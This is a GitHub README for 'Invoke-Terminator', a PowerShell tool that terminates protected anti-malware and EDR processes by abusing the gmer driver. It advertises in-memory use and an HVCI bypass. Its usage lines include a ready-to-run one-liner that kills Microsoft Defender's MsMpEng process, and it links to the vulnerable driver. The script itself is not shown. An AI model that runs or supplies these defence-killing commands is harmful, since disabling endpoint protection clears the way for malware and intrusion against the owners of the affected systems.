/Terminator

PowerShell script to terminate protected processes such as anti-malware and EDRs.

Primary LanguagePowerShellGNU General Public License v3.0GPL-3.0

Invoke-Terminator

xiosec - Terminator stars - Terminator forks - Terminator GitHub release License issues - Terminator

Terminator is a powershell script that terminates protected processes such as anti-malware and EDRs through the gmer driver.

  • in-memory
  • HVCI bypass

Usage

<#
----------------------------
        Terminator

github : github.com/xiosec
twitter: twitter.com/xiosec
----------------------------

* Arguments
    * -ServiceName
    * -ProcName
    * -ProcId
    * -driverPath
    * -AutoKill
#>

Invoke-Terminator -ServiceName terminator -ProcName MsMpEng 

inline

powershell -c ". .\Invoke-Terminator.ps1; Invoke-Terminator -ProcName MsMpEng -AutoKill"

Example

In this example, we kill the MsMpEng process, which is related to the antimalware service. MsMpEng

Links

gmer64.sys

Blackout

License

Released under GPL-3.0 by @xiosec